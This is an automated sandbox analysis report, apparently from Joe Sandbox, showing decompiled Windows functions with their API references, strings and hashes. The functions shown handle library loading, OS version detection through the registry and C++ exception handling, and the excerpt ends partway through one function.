0x000b13b5
0x00000000
0x000b13ab
0x000b13a9
0x000b13be
0x000b13c0
0x000b13c4
0x000b13c6
0x000b13c8
0x000b13d3
0x000b13d3
0x000b13c8
0x000b13d7
0x000b13d9
0x000b13e0
0x000b13e5
0x000b13e5
0x000b13f1
0x000b13fc
0x000b13ff
0x000b1405
0x000b1407
0x000b1409
0x000b140c
0x000b1414
0x000b141a
0x000b1421
0x000b1426
0x000b1429
0x000b142b
0x000b142b
0x000b1432
0x000b1437
0x000b1448
0x000b12a8
0x000b12a8
0x000b12ac
0x000b12ae
0x000b12b0
0x000b12b0
0x000b12ba
0x000b12c0
0x000b12c2
0x000b130f
0x000b1313
0x000b131e
0x000b131e
0x00000000
0x000b12c4
0x000b12c4
0x000b12c6
0x000b12cc
0x000b12ce
0x000b12d3
0x000b12db
0x000b12e1
0x000b12e8
0x000b12f0
0x000b12f2
0x000b12f2
0x000b12f9
0x000b12fe
0x000b1308
0x000b1308
0x000b12c2
0x000b1451
0x000b145a
0x000b1463
0x000b1465
0x000b1473

APIs

LoadLibraryExW.KERNEL32(?,00000000,00001100,00000000,?,?,?,00000000), ref: 000B12BA
GetLastError.KERNEL32(?,?,?,00000000), ref: 000B1315
LoadLibraryW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 000B13B8
GetLastError.KERNEL32(?,00000000,?,?,?,00000000), ref: 000B13CA

Strings

kernel32.dll, xrefs: 000B148E
AddDllDirectory, xrefs: 000B1499
..\..\base\native_library_win.cc, xrefs: 000B122C, 000B125B
LoadNativeLibraryHelper, xrefs: 000B1231, 000B1260

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ErrorLastLibraryLoad
String ID: ..\..\base\native_library_win.cc$AddDllDirectory$LoadNativeLibraryHelper$kernel32.dll
API String ID: 3568775529-1484654216
Opcode ID: 21f0a30d1ddf84a4dc68d774e29ef96feae558e5b5e6eb60d2dda4f60946a4aa
Instruction ID: 16966d9addb1d54c18f6e9d7e9c514c1296cf33e51fa4843bbd59e66f783c6a9
Opcode Fuzzy Hash: 21f0a30d1ddf84a4dc68d774e29ef96feae558e5b5e6eb60d2dda4f60946a4aa
Instruction Fuzzy Hash: 07B11471A043409FD720DF28D895BEAB7E1BF89750F144A2CF89597792EB30E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000A2290 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 329
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E000A2290(signed char* __ecx, void* __fp0, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v24;
				signed char _v29;
				signed char _v32;
				signed char _v36;
				char _v37;
				signed short _v40;
				signed char _v44;
				signed char _v45;
				signed char _v48;
				intOrPtr _v52;
				signed char _v53;
				char _v56;
				char _v60;
				signed char _v61;
				signed char _v65;
				signed char _v68;
				signed int _v72;
				signed short _v76;
				signed int __ebx;
				void* __edi;
				void* __esi;
				signed int _t130;
				struct HINSTANCE__* _t133;
				void* _t138;
				signed char _t148;
				signed int _t153;
				signed int _t160;
				_Unknown_base(*)()* _t175;
				void* _t178;
				signed int _t179;
				signed char _t180;
				signed int _t181;
				intOrPtr _t182;
				intOrPtr _t186;
				char _t189;
				signed char _t193;
				intOrPtr _t195;
				signed char _t200;
				void* _t210;
				signed char _t213;
				signed char* _t214;
				signed int _t215;
				signed char* _t217;
				signed int _t218;
				signed int _t219;
				void* _t221;
				void* _t222;
				void* _t230;
				void* _t241;
				void* _t242;
				void* _t243;

				_t221 = (_t219 & 0xfffffff8) - 0x40;
				_t217 = __ecx;
				_t130 =  *0x120014; // 0xf049169a
				_v24 = _t130 ^ _t218;
				 *__ecx = 0;
				asm("xorps xmm0, xmm0");
				asm("movups [ecx+0x20], xmm0");
				__ecx[0x34] = 0;
				__ecx[0x30] = 0;
				_t210 = GetCurrentProcess();
				_t133 = GetModuleHandleW(L"api-ms-win-core-wow64-l1-1-1.dll");
				_t180 = 5;
				if(_t133 != 0) {
					_t175 = GetProcAddress(_t133, "IsWow64Process2");
					if(_t175 != 0) {
						_v48 = 0xffff;
						_v60 = 0xffff;
						 *0x137000();
						_t206 =  &_v48;
						_t178 =  *_t175(_t210,  &_v48,  &_v60);
						_t180 = 5;
						if(_t178 != 0) {
							_t179 = _v72 & 0x0000ffff;
							if(_t179 > 0x1ff) {
								__eflags = _t179 - 0x200;
								if(__eflags == 0) {
									_t180 = 2;
								} else {
									__eflags = _t179 - 0xaa64;
									if(__eflags == 0) {
										_t180 = 4;
									} else {
										__eflags = _t179 - 0x8664;
										if(__eflags != 0) {
											goto L12;
										} else {
											_t180 = 1;
										}
									}
								}
							} else {
								_t9 = _t179 - 0x1c0; // 0xfe3f
								_t230 = _t9 - 4;
								if(_t230 > 0) {
									L11:
									_t180 = 0;
									__eflags = _t179 - 0x14c;
									if(__eflags != 0) {
										L12:
										_t180 = 5;
									}
								} else {
									_t206 = 0x15;
									asm("bt edx, ecx");
									if(_t230 >= 0) {
										goto L11;
									} else {
										_t180 = 3;
									}
								}
							}
						}
					}
				}
				_t217[0x38] = _t180;
				asm("movaps xmm0, [0x113ab0]");
				asm("movups [esi+0x48], xmm0");
				_t217[0x58] = 0;
				_t186 = _a4;
				_t13 = _t186 + 4; // 0x0
				_t217[4] =  *_t13;
				_t15 = _t186 + 8; // 0x0
				_t217[8] =  *_t15;
				_t17 = _t186 + 0xc; // 0x0
				_t217[0xc] =  *_t17;
				_v36 = 0;
				_v44 = 0;
				_v48 = 0;
				_v40 = 0;
				_v60 = 0xffffffff;
				_v56 = 0xffffffff;
				_v52 = 0xffffffff;
				E000B1610( &_v60);
				_t138 = E000B1630( &_v60, _t206, _t230, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 1);
				_t189 = 0;
				_t207 = 0;
				_t231 = _t138;
				if(_t138 == 0) {
					E000B1720( &_v60, _t231, L"UBR",  &_v36);
					E000B17E0( &_v60, 0, _t231, L"DisplayVersion",  &_v56);
					_t207 = _v53 & 0x000000ff;
					_t189 = _v60;
					_t173 =  <  ? _t189 : _t207;
					_t233 =  <  ? _t189 : _t207;
					if(( <  ? _t189 : _t207) == 0) {
						E000B17E0( &_v60, _t207, _t233, L"ReleaseId",  &_v56);
						_t207 = _v45 & 0x000000ff;
						_t189 = _v52;
					}
				}
				_t140 =  >=  ?  &_v48 : _v48;
				_t209 =  <  ? _t189 : _t207 & 0x000000ff;
				L0009F8A0( &_v72,  >=  ?  &_v48 : _v48,  <  ? _t189 : _t207 & 0x000000ff);
				_t222 = _t221 + 0xc;
				_t213 = _v36;
				_v76 = _v72;
				_v32 = _v68;
				_v29 = _v65;
				_t181 = _v61 & 0x000000ff;
				E000B16D0( &_v60);
				if(_v37 < 0) {
					L000DDBEC(_v48);
					_t222 = _t222 + 4;
				}
				_t217[0x10] = _t213;
				if(_t217[0x2b] < 0) {
					_t51 =  &(_t217[0x20]); // 0x20
					L000DDBEC( *_t51);
					_t222 = _t222 + 4;
				}
				_t217[0x20] = _v76;
				_t217[0x24] = _v32;
				_t217[0x27] = _v29;
				_t217[0x2b] = _t181;
				_t193 = _t217[4];
				_t148 = 0x15;
				if(_t193 == 0xb) {
					_t182 = _a4;
				} else {
					_t182 = _a4;
					if(_t193 != 0xa) {
						_t148 = 0x16;
						__eflags = _t193 - 6;
						if(__eflags <= 0) {
							_t209 = _t217[8];
							if(__eflags != 0) {
								_t148 = 0;
								__eflags = _t209;
								if(_t209 != 0) {
									__eflags = _t193 - 5;
									if(_t193 == 5) {
										__eflags = _t209 - 1;
										_t148 = 2 - (0 | _t209 == 0x00000001);
									}
								}
							} else {
								__eflags = _t209;
								if(_t209 == 0) {
									_t148 = 3;
								} else {
									__eflags = _t209 - 2;
									if(_t209 == 2) {
										_t148 = 5;
									} else {
										__eflags = _t209 - 1;
										if(_t209 != 1) {
											_t148 = 6;
										} else {
											_t148 = 4;
										}
									}
								}
							}
						}
					} else {
						_t200 = _t217[0xc];
						if(_t200 <= 0x55ef) {
							_t148 = 0x14;
							if(_t200 <= 0x4f7b) {
								_t148 = 0x13;
								_t241 = _t200 - 0x4a63;
								if(_t241 <= 0) {
									_t148 = 0x12;
									if(_t241 != 0) {
										_t148 = 0x11;
										_t242 = _t200 - 0x4a61;
										if(_t242 <= 0) {
											_t148 = 0x10;
											if(_t242 != 0) {
												_t148 = 0xf;
												_t243 = _t200 - 0x47ba;
												if(_t243 <= 0) {
													_t148 = 0xe;
													if(_t243 != 0) {
														_t148 = 0xd;
														if(_t200 <= 0x4562) {
															_t148 = 0xc;
															if(_t200 <= 0x42ed) {
																_t148 = 0xb;
																if(_t200 <= 0x3faa) {
																	_t148 = 0xa;
																	if(_t200 <= 0x3ad6) {
																		_t148 = 9;
																		if(_t200 <= 0x3838) {
																			_t148 = 7;
																			asm("sbb eax, 0xffffffff");
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *_t217 = _t148;
				E000A2770(_t182, _t217, GetCurrentProcess());
				_t63 = _t182 + 0x114; // 0x0
				_t217[0x18] =  *_t63 & 0x0000ffff;
				_t65 = _t182 + 0x116; // 0x0
				_t217[0x1c] =  *_t65 & 0x0000ffff;
				_t183 = _t182 + 0x14;
				if(_t182 + 0x14 == 0) {
					_t153 = 0;
					__eflags = 0;
				} else {
					_t153 = E000F33D4(_t183);
					_t222 = _t222 + 4;
				}
				_t67 =  &(_t217[0x2c]); // 0x2c
				_t214 = _t67;
				L0009F8A0( &_v48, _t183, _t153);
				if(_t217[0x37] < 0) {
					L000DDBEC( *_t214);
				}
				_t214[8] = _v40;
				asm("movsd xmm0, [esp+0x20]");
				asm("movsd [edi], xmm0");
				_t215 = _a8;
				_t217[0x3c] =  *(_t215 + 0x14);
				_t217[0x44] =  *(_t215 + 0x1c);
				_t217[0x40] = L000A1FC0(_t209);
				_t195 = _a4;
				_t79 = _t195 + 4; // 0x0
				_t160 =  *_t79;
				if(_t160 == 5) {
					_t84 = _t195 + 8; // 0x0
					_t160 =  *_t84;
					__eflags = _t160 - 1;
					if(_t160 == 1) {
						__eflags =  *(_t195 + 0x119) & 0x00000002;
						if(( *(_t195 + 0x119) & 0x00000002) != 0) {
							goto L64;
						} else {
							goto L63;
						}
					} else {
						__eflags = _t160 - 2;
						if(_t160 != 2) {
							goto L64;
						} else {
							__eflags =  *((char*)(_t195 + 0x11a)) - 1;
							if( *((char*)(_t195 + 0x11a)) != 1) {
								L55:
								__eflags =  *((short*)(_t195 + 0x118));
								if( *((short*)(_t195 + 0x118)) < 0) {
									goto L64;
								} else {
									goto L56;
								}
							} else {
								_t209 = _t215;
								__eflags =  *_t215 - 9;
								if( *_t215 == 9) {
									goto L63;
								} else {
									goto L55;
								}
							}
						}
					}
					goto L65;
				} else {
					if(_t160 == 0xa || _t160 == 6) {
						_t160 = _a12 - 1;
						if(_t160 > 0xca) {
							goto L64;
						} else {
							switch( *((intOrPtr*)(_t160 * 4 +  &M00113BDC))) {
								case 0:
									L63:
									_t217[0x14] = 1;
									goto L65;
								case 1:
									goto L64;
								case 2:
									_t217[0x14] = 3;
									goto L65;
								case 3:
									L56:
									_t217[0x14] = 2;
									goto L65;
								case 4:
									 *(__esi + 0x14) = 4;
									goto L65;
								case 5:
									 *(__esi + 0x14) = 5;
									goto L65;
								case 6:
									L78:
									asm("movq xmm0, [esp+0x20]");
									asm("movq [esi+0x8], xmm0");
									goto L87;
								case 7:
									L80:
									__ecx =  &_v48;
									__eax = L000A2C70(__ebx,  &_v48, __edi, __eflags, _v72);
									goto L87;
								case 8:
									L81:
									__ecx =  *(__esi + 0x24);
									__eax = L000B4810( *(__esi + 0x24), __edx, __fp0, _v48, _v40);
									goto L87;
								case 9:
									L82:
									__ecx =  *(__esi + 0x2c);
									__eax = E000B5030( *(__esi + 0x2c), __fp0, _v48, _v40);
									goto L87;
								case 0xa:
									L83:
									asm("movq xmm0, [esp+0x20]");
									asm("movq [esi+0x10], xmm0");
									goto L87;
								case 0xb:
									L84:
									__ecx =  *(__esi + 0x28);
									__eax = L000B4C90( *(__esi + 0x28), __fp0, _v48, _v40);
									goto L87;
								case 0xc:
									L85:
									__ecx =  *(__esi + 0x30);
									__eax = E000B5410( *(__esi + 0x30), __fp0, _v48, _v40);
									goto L87;
								case 0xd:
									L86:
									__ecx =  *(__esi + 0x34);
									__eax = E000B5720( *(__esi + 0x34), __edx, __fp0, _v48, _v40);
									while(1) {
										L87:
										__ecx = __ebx;
										__eax = E00077468(__ebx, __edi);
										asm("movdqu xmm0, [esp+0x10]");
										asm("movdqa [esp+0x20], xmm0");
										__ecx = _v40 & 0x0000ffff;
										__eflags = __cx;
										if(__cx == 0) {
											break;
										}
										__eflags = __cx - 8;
										if(__cx <= 8) {
											0 = 1;
											__eax = 1 << __cl;
											_t100 = __esi + 0x44;
											 *_t100 =  *(__esi + 0x44) | 1 << __cl;
											__eflags =  *_t100;
										}
										__eax = __cx & 0x0000ffff;
										__eax = (__cx & 0x0000ffff) - 1;
										__eflags = __eax - 7;
										if(__eflags > 0) {
											__ecx =  &_v48;
											__eax = L00076D54(__ebx,  &_v48, __edx, __fp0, _v68);
										} else {
											switch( *((intOrPtr*)(__eax * 4 +  &M00113F08))) {
												case 0:
													goto L78;
												case 1:
													goto L80;
												case 2:
													goto L81;
												case 3:
													goto L82;
												case 4:
													goto L83;
												case 5:
													goto L84;
												case 6:
													goto L85;
												case 7:
													goto L86;
											}
										}
									}
									__eax = _v16;
									__eflags = __eax - _v12;
									__ebx = __ebx & 0xffffff00 | __eax == _v12;
									__ecx = _v8;
									__ecx = _v8 ^ __ebp;
									__eflags = __ecx;
									0 = __ebx;
									__esp =  &_v16;
									return __ebx;
									goto L89;
							}
						}
					} else {
						L64:
						_t217[0x14] = 0;
						L65:
						E000DE643(_t160, _t183, _v24 ^ _t218, _t209, _t215, _t217);
						return _t217;
					}
				}
				L89:
			}

0x000a2299
0x000a229c
0x000a229e
0x000a22a5
0x000a22a9
0x000a22af
0x000a22b2
0x000a22b6
0x000a22bd
0x000a22ca
0x000a22d1
0x000a22d7
0x000a22de
0x000a22ea
0x000a22f2
0x000a22fa
0x000a2301
0x000a2308
0x000a2312
0x000a2319
0x000a231b
0x000a2322
0x000a2324
0x000a232e
0x000a234c
0x000a2351
0x000a2378
0x000a2353
0x000a2353
0x000a2358
0x000a237f
0x000a235a
0x000a235a
0x000a235f
0x00000000
0x000a2361
0x000a2361
0x000a2361
0x000a235f
0x000a2358
0x000a2330
0x000a2330
0x000a2336
0x000a2339
0x000a2368
0x000a2368
0x000a236a
0x000a236f
0x000a2371
0x000a2371
0x000a2371
0x000a233b
0x000a233b
0x000a2340
0x000a2343
0x00000000
0x000a2345
0x000a2345
0x000a2345
0x000a2343
0x000a2339
0x000a232e
0x000a2322
0x000a22f2
0x000a2384
0x000a2387
0x000a238e
0x000a2392
0x000a2399
0x000a239c
0x000a239f
0x000a23a2
0x000a23a5
0x000a23a8
0x000a23ab
0x000a23ae
0x000a23b6
0x000a23be
0x000a23c6
0x000a23ce
0x000a23d6
0x000a23de
0x000a23ec
0x000a23ff
0x000a2404
0x000a2406
0x000a240b
0x000a240d
0x000a241f
0x000a2430
0x000a2435
0x000a243c
0x000a2442
0x000a2445
0x000a2447
0x000a2453
0x000a2458
0x000a245d
0x000a245d
0x000a2447
0x000a246b
0x000a2471
0x000a247b
0x000a2480
0x000a2483
0x000a248b
0x000a2493
0x000a249b
0x000a249f
0x000a24a8
0x000a24b2
0x000a24b8
0x000a24bd
0x000a24bd
0x000a24c0
0x000a24c7
0x000a24c9
0x000a24ce
0x000a24d3
0x000a24d3
0x000a24da
0x000a24e5
0x000a24e8
0x000a24eb
0x000a24ee
0x000a24f1
0x000a24f9
0x000a25c0
0x000a24ff
0x000a2502
0x000a2505
0x000a25c5
0x000a25ca
0x000a25cd
0x000a26b8
0x000a26bb
0x000a2711
0x000a2713
0x000a2715
0x000a271b
0x000a271e
0x000a2726
0x000a2731
0x000a2731
0x000a271e
0x000a26bd
0x000a26bd
0x000a26bf
0x000a274a
0x000a26c5
0x000a26c5
0x000a26c8
0x000a2754
0x000a26ce
0x000a26ce
0x000a26d1
0x000a275e
0x000a26d7
0x000a26d7
0x000a26d7
0x000a26d1
0x000a26c8
0x000a26bf
0x000a26bb
0x000a250b
0x000a250b
0x000a2514
0x000a251a
0x000a2525
0x000a252b
0x000a2530
0x000a2536
0x000a253c
0x000a2541
0x000a2547
0x000a254c
0x000a2552
0x000a2554
0x000a2559
0x000a255b
0x000a2560
0x000a2566
0x000a2568
0x000a256d
0x000a256f
0x000a257a
0x000a257c
0x000a2587
0x000a2589
0x000a2594
0x000a2596
0x000a25a1
0x000a25a3
0x000a25ae
0x000a25b6
0x000a25bb
0x000a25bb
0x000a25ae
0x000a25a1
0x000a2594
0x000a2587
0x000a257a
0x000a256d
0x000a2566
0x000a2559
0x000a2552
0x000a2541
0x000a2536
0x000a2525
0x000a2514
0x000a2505
0x000a25d3
0x000a25de
0x000a25e3
0x000a25ea
0x000a25ed
0x000a25f4
0x000a25f7
0x000a25fa
0x000a2607
0x000a2607
0x000a25fc
0x000a25fd
0x000a2602
0x000a2602
0x000a2609
0x000a2609
0x000a2613
0x000a261f
0x000a2623
0x000a2628
0x000a262f
0x000a2632
0x000a2638
0x000a263c
0x000a2642
0x000a2648
0x000a2650
0x000a2653
0x000a2656
0x000a2656
0x000a265c
0x000a2687
0x000a2687
0x000a268a
0x000a268d
0x000a26e1
0x000a26e8
0x00000000
0x00000000
0x00000000
0x00000000
0x000a268f
0x000a268f
0x000a2692
0x00000000
0x000a2694
0x000a2694
0x000a269b
0x000a26a5
0x000a26a5
0x000a26ad
0x00000000
0x00000000
0x00000000
0x00000000
0x000a269d
0x000a269d
0x000a269f
0x000a26a3
0x00000000
0x00000000
0x00000000
0x00000000
0x000a26a3
0x000a269b
0x000a2692
0x00000000
0x000a265e
0x000a2661
0x000a266f
0x000a2675
0x00000000
0x000a2677
0x000a2677
0x00000000
0x000a26ea
0x000a26ea
0x00000000
0x00000000
0x00000000
0x00000000
0x000a267e
0x00000000
0x00000000
0x000a26af
0x000a26af
0x00000000
0x00000000
0x000a2738
0x00000000
0x00000000
0x000a2741
0x00000000
0x00000000
0x000a306e
0x000a306e
0x000a3074
0x00000000
0x00000000
0x000a308d
0x000a308d
0x000a3095
0x00000000
0x00000000
0x000a309c
0x000a309c
0x000a30a7
0x00000000
0x00000000
0x000a30ae
0x000a30ae
0x000a30b9
0x00000000
0x00000000
0x000a30c0
0x000a30c0
0x000a30c6
0x00000000
0x00000000
0x000a30cd
0x000a30cd
0x000a30d8
0x00000000
0x00000000
0x000a30df
0x000a30df
0x000a30ea
0x00000000
0x00000000
0x000a30f1
0x000a30f1
0x000a30fc
0x000a3101
0x000a3101
0x000a3101
0x000a3104
0x000a3109
0x000a310f
0x000a3115
0x000a311a
0x000a311d
0x00000000
0x00000000
0x000a3050
0x000a3054
0x000a3058
0x000a3059
0x000a305b
0x000a305b
0x000a305b
0x000a305b
0x000a305e
0x000a3061
0x000a3062
0x000a3065
0x000a307e
0x000a3086
0x000a3067
0x000a3067
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000a3067
0x000a3065
0x000a3123
0x000a3127
0x000a312b
0x000a312e
0x000a3132
0x000a3132
0x000a3139
0x000a313b
0x000a3142
0x00000000
0x00000000
0x000a2677
0x000a26f3
0x000a26f3
0x000a26f3
0x000a26fa
0x000a2700
0x000a270e
0x000a270e
0x000a2661
0x00000000

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,0000011C,00000000,?,000A2117,0000011C,00126A38,00000000), ref: 000A22C4
GetModuleHandleW.KERNEL32(api-ms-win-core-wow64-l1-1-1.dll,?,?,?,?,?,?,?,?,00000000,0000011C,00000000,?,000A2117,0000011C,00126A38), ref: 000A22D1
GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 000A22EA
GetCurrentProcess.KERNEL32 ref: 000A25D5

Strings

IsWow64Process2, xrefs: 000A22E4
api-ms-win-core-wow64-l1-1-1.dll, xrefs: 000A22CC
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 000A23F5
UBR, xrefs: 000A241A
DisplayVersion, xrefs: 000A242B
ReleaseId, xrefs: 000A244E

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: CurrentProcess$AddressHandleModuleProc
String ID: DisplayVersion$IsWow64Process2$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR$api-ms-win-core-wow64-l1-1-1.dll
API String ID: 1114296175-236569533
Opcode ID: dc47e78068af5a1ab4d9e57847737e9580252c9f16bc592f468b71841c206b75
Instruction ID: 3538eff03602e1ba468ad6d7a421a9f2f0f2d8319833206bce315c1f98581d5a
Opcode Fuzzy Hash: dc47e78068af5a1ab4d9e57847737e9580252c9f16bc592f468b71841c206b75
Instruction Fuzzy Hash: DEC1E270A087409BEB24CF6CC5947ABB7E0FB86304F14493EF48687681D778DA858B52

Uniqueness

Uniqueness Score: -1.00%

Function 000F45C4 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E000F45C4(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t147;
				signed int _t153;
				void* _t156;
				signed char _t161;
				signed int _t162;
				void* _t164;
				void* _t167;
				void* _t170;
				signed char _t177;
				intOrPtr* _t182;
				void* _t185;
				signed int* _t187;
				signed int _t188;
				signed int _t189;
				signed int _t191;
				void* _t195;
				void* _t200;
				void* _t201;
				intOrPtr _t205;
				intOrPtr* _t206;
				signed int _t207;
				signed int _t214;
				signed int _t215;
				intOrPtr _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t223;
				signed int _t228;
				signed int _t229;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t220 = __edx;
				_t222 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t208 = L00100E2B(_a8, _a16, _t222);
				_t238 = _t237 + 0xc;
				_v12 = _t208;
				if(_t208 < 0xffffffff || _t208 >= _t222[1]) {
					L66:
					L000EE930(_t206, _t208, _t220, _t222, _t229);
					asm("int3");
					__eflags = _v88;
					_push(_t206);
					_t207 = _v92;
					_push(_t229);
					_push(_t222);
					_t223 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t207);
						_push(_t223);
						_push(_v0);
						E000F452B(_t207, _t223, _t229, __eflags);
						_t238 = _t238 + 0x10;
					}
					_t147 = _a36;
					__eflags = _t147;
					if(_t147 == 0) {
						_t147 = _t223;
					}
					E000DF630(_t208, _t147, _v0);
					_t230 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t223);
					L000F3E4C(_t207, _t208, _t220, _t223, _a28, __eflags);
					L00100E48(_t223, _a16,  *((intOrPtr*)(_t230 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t207 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t223);
					_push(_v0);
					_t153 = L000F3F76(_t207, _t220, _t223, _t230, __eflags);
					__eflags = _t153;
					if(_t153 != 0) {
						E000DF600(_t153, _t223);
						return _t153;
					}
					return _t153;
				} else {
					_t206 = _a4;
					if( *_t206 != 0xe06d7363 ||  *((intOrPtr*)(_t206 + 0x10)) != 3 ||  *((intOrPtr*)(_t206 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t206 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t206 + 0x14)) != 0x19930522) {
						L22:
						_t220 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t229 = 0;
						if( *((intOrPtr*)(_t206 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t156 = L000F3D51(_t206, _t208, _t220, _t222, 0);
							if( *((intOrPtr*)(_t156 + 0x10)) == 0) {
								L60:
								return _t156;
							} else {
								_t206 =  *((intOrPtr*)(L000F3D51(_t206, _t208, _t220, _t222, 0) + 0x10));
								_t195 = L000F3D51(_t206, _t208, _t220, _t222, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t195 + 0x14));
								if(_t206 == 0 ||  *_t206 == 0xe06d7363 &&  *((intOrPtr*)(_t206 + 0x10)) == 3 && ( *((intOrPtr*)(_t206 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t206 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t206 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t206 + 0x1c)) == _t229) {
									goto L66;
								} else {
									if( *((intOrPtr*)(L000F3D51(_t206, _t208, _t220, _t222, _t229) + 0x1c)) == _t229) {
										L23:
										_t220 = _v8;
										_t208 = _v12;
										L24:
										_v52 = _t222;
										_v48 = 0;
										__eflags =  *_t206 - 0xe06d7363;
										if( *_t206 != 0xe06d7363) {
											L56:
											__eflags = _t222[3];
											if(_t222[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													L000F49EE(_t208, _t220, _t222, _t229, _t206, _a8, _t220, _a16, _t222, _t208, _a28, _a32);
													_t238 = _t238 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t206 + 0x10)) - 3;
											if( *((intOrPtr*)(_t206 + 0x10)) != 3) {
												goto L56;
											} else {
												__eflags =  *((intOrPtr*)(_t206 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t206 + 0x14)) == 0x19930520) {
													L29:
													_t229 = _a32;
													__eflags = _t222[3];
													if(_t222[3] > 0) {
														E000DF590(_t208,  &_v68,  &_v52, _t208, _a16, _t222, _a28);
														_t220 = _v64;
														_t238 = _t238 + 0x18;
														_t182 = _v68;
														_v44 = _t182;
														_v16 = _t220;
														__eflags = _t220 - _v56;
														if(_t220 < _v56) {
															_t214 = _t220 * 0x14;
															__eflags = _t214;
															_v32 = _t214;
															do {
																_t215 = 5;
																_t185 = memcpy( &_v104,  *((intOrPtr*)( *_t182 + 0x10)) + _t214, _t215 << 2);
																_t238 = _t238 + 0xc;
																__eflags = _v104 - _t185;
																if(_v104 <= _t185) {
																	__eflags = _t185 - _v100;
																	if(_t185 <= _v100) {
																		_t218 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t187 =  *( *((intOrPtr*)(_t206 + 0x1c)) + 0xc);
																			_t221 =  *_t187;
																			_t188 =  &(_t187[1]);
																			__eflags = _t188;
																			_v36 = _t188;
																			_t189 = _v88;
																			_v40 = _t221;
																			_v24 = _t189;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t228 = _v36;
																				_t234 = _t221;
																				__eflags = _t234;
																				if(_t234 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t191 = E000F435F( &_v84,  *_t228,  *((intOrPtr*)(_t206 + 0x1c)));
																						_t238 = _t238 + 0xc;
																						__eflags = _t191;
																						if(_t191 != 0) {
																							break;
